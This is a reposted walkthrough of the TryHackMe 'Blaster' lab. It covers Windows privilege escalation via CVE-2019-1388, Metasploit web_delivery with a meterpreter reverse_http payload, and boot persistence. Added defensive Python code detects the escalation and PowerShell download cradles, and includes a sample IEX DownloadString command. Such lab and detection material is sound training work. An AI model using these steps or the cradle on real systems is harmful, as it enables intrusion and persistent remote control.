Tryhackme-Blaster

2021-10-22 14:35:03  Views: 225  Source: Internet

Tags: What Blaster machine Windows command our Microsoft Tryhackme


Blaster

Task1 Mission Start!

Deploy the machine! This is a Windows box so give it a few minutes (3-5 at max) to come online

Task2 Activate Forward Scanners and Launch Proton Torpedoes

1.How many ports are open on our target system?

2

2.Looks like there’s a web server running, what is the title of the page we discover when browsing to it?

IIS Windows Server

3.Interesting, let’s see if there’s anything else on this web server by fuzzing it. What hidden directory do we discover?

/retro

4.Navigate to our discovered hidden directory, what potential username do we discover?

wade

5.Crawling through the posts, it seems like our user has had some difficulties logging in recently. What possible password do we discover?

parzival

6.Log into the machine via Microsoft Remote Desktop (MSRDP) and read user.txt. What are its contents?

Using the credentials wade:parzival, connect to the target machine over Remote Desktop and find user.txt on the desktop; the flag is THM{HACK_PLAYER_ONE}

Task3 Breaching the Control Room

1.When enumerating a machine, it’s often useful to look at what the user was last doing. Look around the machine and see if you can find the CVE which was researched on this server. What CVE was it?

CVE-2019-1388

Microsoft Windows Certificate Dialog elevation of privilege vulnerability (CVE-2019-1388)
Published: 2019-11-12
Affected systems:
Microsoft Windows Server 2019; Microsoft Windows Server 2016; Microsoft Windows Server 2012; Microsoft Windows Server 2008 R2; Microsoft Windows Server 2008; Microsoft Windows RT 8.1; Microsoft Windows 8.1; Microsoft Windows 7

2.Looks like an executable file is necessary for exploitation of this vulnerability and the user didn’t really clean up very well after testing it. What is the name of this executable?

hhupd

3.Research vulnerability and how to exploit it. Exploit it now to gain an elevated terminal!

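1. Right-click the hhupd program and show the details; 2. Click to show the certificate information; 3. Click the certificate issuer link, and the IE browser starts by itself; 4. In the top-right corner of the browser, click Save As; 5. Close the error dialog and delete the contents of the file name box; 6. Type C:\Windows\System32*.* into the file name box and find cmd; 7. Right-click cmd and click Open.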

4.Now that we’ve spawned a terminal, let’s go ahead and run the command ‘whoami’. What is the output of running this?

nt authority\system
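Seen from the defender's side, the steps above leave a distinctive process tree: a browser running as SYSTEM whose parent is the UAC prompt, with a shell underneath it. The following is an added example, not part of the original write-up, that flags this lineage in process-creation telemetry. The parent process name consent.exe, the event field names, the PIDs and the sample events are assumptions constructed for illustration.

```python
import ntpath

SYSTEM = r"nt authority\system"
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed process-creation events in chronological order
# (field names are hypothetical, shaped like Sysmon Event ID 1 data).
EVENTS = [
    {"pid": 3300, "ppid": 2900, "user": r"HOST\wade", "image": r"C:\Windows\explorer.exe"},
    {"pid": 3410, "ppid": 3300, "user": r"HOST\wade", "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 4012, "ppid": 820, "user": r"NT AUTHORITY\SYSTEM", "image": r"C:\Windows\System32\consent.exe"},
    {"pid": 5120, "ppid": 4012, "user": r"NT AUTHORITY\SYSTEM", "image": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"pid": 5188, "ppid": 5120, "user": r"NT AUTHORITY\SYSTEM", "image": r"C:\Program Files (x86)\Internet Explorer\iexplore.exe"},
    {"pid": 5300, "ppid": 5188, "user": r"NT AUTHORITY\SYSTEM", "image": r"C:\Windows\System32\cmd.exe"},
]

def exe(event):
    """Lower-cased executable name from a Windows image path."""
    return ntpath.basename(event["image"]).lower()

def find_uac_browser_escapes(events):
    """Flag SYSTEM browsers started by consent.exe and any shell beneath them."""
    by_pid, tainted, findings = {}, set(), []
    for ev in events:
        parent = by_pid.get(ev["ppid"])
        by_pid[ev["pid"]] = ev  # assumes no PID reuse inside the window
        if ev["user"].lower() != SYSTEM:
            continue
        if parent and exe(parent) == "consent.exe" and exe(ev) in BROWSERS:
            tainted.add(ev["pid"])
            findings.append(("system_browser_from_uac", ev["pid"], exe(ev)))
        elif ev["ppid"] in tainted:
            tainted.add(ev["pid"])  # follow the browser's child processes
            if exe(ev) in SHELLS:
                findings.append(("system_shell_under_uac_browser", ev["pid"], exe(ev)))
    return findings

if __name__ == "__main__":
    for finding in find_uac_browser_escapes(EVENTS):
        print(finding)
```

The ordinary cmd.exe that wade starts from explorer.exe is not flagged; only the SYSTEM browser and the shell below it are.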

5.Now that we’ve confirmed that we have an elevated prompt, read the contents of root.txt on the Administrator’s desktop. What are the contents? Keep your terminal up after exploitation so we can use it in task four!

THM{COIN_OPERATED_EXPLOITATION}

Task4 Adoption into the Collective

1.Return to your attacker machine for this next bit. Since we know our victim machine is running Windows Defender, let’s go ahead and try a different method of payload delivery! For this, we’ll be using the script web delivery exploit within Metasploit. Launch Metasploit now and select ‘exploit/multi/script/web_delivery’ for use.

2.First, let’s set the target to PSH (PowerShell). Which target number is PSH?

2

3.After setting your payload, set your lhost and lport accordingly such that you know which port the MSF web server is going to run on and that it’ll be running on the TryHackMe network.

4.Finally, let’s set our payload. In this case, we’ll be using a simple reverse HTTP payload. Do this now with the command: ‘set payload windows/meterpreter/reverse_http’. Following this, launch the attack as a job with the command ‘run -j’.

5.Return to the terminal we spawned with our exploit. In this terminal, paste the command output by Metasploit after the job was launched. In this case, I’ve found it particularly helpful to host a simple python web server (python3 -m http.server) and host the command in a text file as copy and paste between the machines won’t always work. Once you’ve run this command, return to our attacker machine and note that our reverse shell has spawned.

6.Last but certainly not least, let’s look at persistence mechanisms via Metasploit. What command can we run in our meterpreter console to setup persistence which automatically starts when the system boots? Don’t include anything beyond the base command and the option for boot startup.

run persistence -X

7.Run this command now with options that allow it to connect back to your host machine should the system reboot. Note, you’ll need to create a listener via the handler exploit to allow for this remote connection in actual practice. Congrats, you’ve now gained full control over the remote host and have established persistence for further operations!
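A defender-side view of step 5, as an added example that is not part of the original write-up: script web delivery through PowerShell leaves a process command line that fetches and runs remote content, and this triage function scores such command lines, decoding -EncodedCommand first. The indicator patterns, function names and sample command lines are assumptions constructed for illustration, not output captured from Metasploit.

```python
import base64
import re

INDICATORS = {
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "hidden": re.compile(r"-w(in(dowstyle)?)?\s+hidden", re.I),
    "noprofile": re.compile(r"-nop(rofile)?\b", re.I),
}

def decode_encoded(cmdline):
    """Return the script behind -EncodedCommand (any accepted abbreviation), or None."""
    tokens = cmdline.split()
    for flag, arg in zip(tokens, tokens[1:]):
        f = flag.lower()
        if f == "-ec" or (len(f) >= 2 and "-encodedcommand".startswith(f)):
            try:  # PowerShell expects base64 over UTF-16LE text
                return base64.b64decode(arg, validate=True).decode("utf-16-le")
            except ValueError:
                return None
    return None

def triage(cmdline):
    """Set of indicator names seen in a PowerShell command line, decoded layer included."""
    if not re.search(r"\b(powershell|pwsh)(\.exe)?\b", cmdline, re.I):
        return set()
    hits, text = set(), cmdline
    inner = decode_encoded(cmdline)
    if inner is not None:
        hits.add("encoded")
        text += " " + inner
    return hits | {name for name, rx in INDICATORS.items() if rx.search(text)}

def is_remote_script_exec(cmdline):
    """True when the command both fetches remote content and executes it."""
    return {"download", "exec"} <= triage(cmdline)

# Constructed samples; 192.0.2.10 is a documentation address.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10:8080/a')"
PLAIN = 'powershell.exe -nop -w hidden -c "' + CRADLE + '"'
ENCODED = "powershell.exe -nop -w hidden -e " + base64.b64encode(CRADLE.encode("utf-16-le")).decode()
BENIGN = r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"

if __name__ == "__main__":
    for sample in (PLAIN, ENCODED, BENIGN):
        print(is_remote_script_exec(sample), sorted(triage(sample)))
```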

Source: https://blog.csdn.net/qq_36531487/article/details/120903906
